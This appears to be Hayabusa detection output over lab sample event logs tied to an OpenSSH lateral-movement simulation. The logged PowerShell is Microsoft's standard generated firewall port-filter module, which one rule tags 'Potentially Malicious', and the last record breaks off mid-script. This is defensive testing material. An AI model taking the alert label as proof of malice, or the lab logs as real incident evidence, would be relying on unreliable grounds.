2021-04-22 19:19:38.403 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.404 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and 
(@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] 
${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 
3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] 
${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 